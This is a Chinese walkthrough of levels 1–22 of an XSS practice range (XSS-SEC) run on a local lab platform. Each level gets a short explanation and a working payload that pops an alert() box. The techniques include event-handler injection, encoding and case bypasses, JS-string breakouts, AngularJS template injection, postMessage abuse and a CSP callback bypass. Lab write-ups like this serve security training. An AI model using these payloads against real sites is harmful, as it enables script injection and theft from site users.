XSS-SEC靶场-前21关通过流程

贵生
ID: 1161
19019 次访问
568 次下载
XSS-SEC靶场-前21关通过流程
计算机学习资源渗透学习-书籍渗透技术文章

XSS-SEC靶场-前21关通过流程

准备工具:

  • LingJing靶场平台
  • 杨CC资源站 中的 [XSS-FUZZ字典]
  • Trae cn(第十三关之后,会涉及到此工具)

LingJing-靶场选择:

杨CC资源站的XSS字典

开始搞事!

  • 启动靶场

第一关

说明:

  • 基础玩法

  • <script>alert('杨CC最帅')</script>

  • 点击SUBMIT

  • 回显成功

  • 2:

第二关(第二关以及以后,更换浏览器):

说明:

基于DOM的XSS

界面:

玩法:

URL后面跟上?keyword=test

复现:

代码:

  • <script>alert('杨CC最帅')</script>
  • <script>alert('杨CC最帅')</script>

第三关:

说明:

存储型的XSS

界面:

复现:

  • <script>alert('杨CC最帅')</script>

第四关

说明:

使用不一样的标签进行突破限制

界面:

复现:

  • " autofocus onfocus=alert('杨CC最帅') "

  • 注意:这一行代码是自动触发弹窗,如果不想无限制触发,可以使用div或者其他标签,如:

  • <div data-value="USER_INPUT"></div>
    
  • <div data-value="USER_INPUT"></div>

  • 使用此div注入后,则会显示:

  • 按需即可

第五关

说明:

  • 禁止</script> 标签

界面:

复现:

  • "<img/src=22 onerror=window.alert('杨CC最帅')>

第六关:

说明:

打破单引号限制

界面:

复现:

  • ' autofocus onfocus=alert(杨CC最帅) '

第七关(出现了点小插曲,重新启动靶场)

说明:

关键词删除

界面:

复现:

  • "><sscriptcript>alert("杨CC最帅")</sscriptcript>

第八关

说明:

编码绕过

界面:

复现:

  • &#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#26472;&#67;&#67;&#30495;&#24066;&#39;&#41;

第九关:

说明:

URL 验证 - 必须包含 http://

界面:

复现:

  • http://192.168.242.69:3000/level9/index.php?keyword=" onmouseover=alert('杨CC最帅') "

  • 需要注意的是:此处返回弹窗可能会很慢.

第十关:

说明:

协议绕过-大小写

界面:

复现:

  • JAVASCRIPT:alert('杨CC真帅')

第十一关:

说明:

JS上下文绕过

界面:

复现:

  • ';alert('杨CC最帅了');//

第十二关

说明:

通过哈希方式进行DOM XSS

界面:

复现:

  • %3Cimg%20src%3Dx%20onerror%3Dalert%28%27%E6%9D%A8CC%E7%9C%9F%E5%B8%85%27%29%3E

第十三关(此关卡与后续关卡由Trae cn介入):

说明:

正则表达式

界面:

复现:

  • <img src=x onerror=alert('杨CC真帅')>

  • 其他复现方式:

  • <div onclick=alert('杨CC真帅')>点击我</div>

  • <button onclick=alert('杨CC真帅')>点击我</button>

第十四关:

说明:

双重编码

界面:

复现:

  • %22%29%3Balert%28%27%E6%9D%A8CC%E7%9C%9F%E5%B8%85%27%29%3B%2F%2F

第十五关:

说明:

框架注入,AngularJS模板注入

界面:

复现:

  • {{constructor.constructor('alert("杨CC真帅")')()}}

第十六关:

说明:

跟服务器沟通的xss

界面:

复现:

  • data:text/html,%3Cscript%3Eparent.postMessage('%3Cimg src=x onerror=alert(1)%3E','*')%3C/script%3E
  • 会乱码,所以这次不弄杨CC真帅了

第十七关:

说明:

CSP绕过

界面:

复现:

  • data:text/html,<script src="http://192.168.242.69:3000/level17/index.php?callback=alert('杨CC真帅')"></script> (可以与16关一致)
  • <script src="?callback=alert('杨CC真帅')"></script>

第十八关:

说明:

href 存储型xss

界面:

复现:

  • javascript:alert('杨CC真帅')

第十九关:

说明:

选择中的DOM XSS

界面:

复现:

  • </option></select><script>alert('杨CC真帅')</script>
  • %3C%2Foption%3E%3C%2Fselect%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28%27%E6%9D%A8CC%E7%9C%9F%E5%B8%85%27%29%3E
  • </option></select><div onclick=alert('杨CC真帅')>点击我</div>

第二十关:

说明:

jQuery attr() 中的 DOM XSS。

界面:

复现:

  • javascript:(function(){alert('杨CC真帅');})()
  • 需要点击[Back to Home],来触发弹窗

第二十一关(再次重启):

说明:

JS 字符串中的反射型跨站脚本(XSS)。

界面

复现:

  • '};alert('杨CC真帅');var a={'test':'test

第二十二关(再次重启)

说明:

反射型 DOM 型跨站脚本攻击

界面:

复现:

注意: 此处无对应资源,点击最下方的[查看 或 下载资源]后会自动跳转到首页

资源下载 或 查看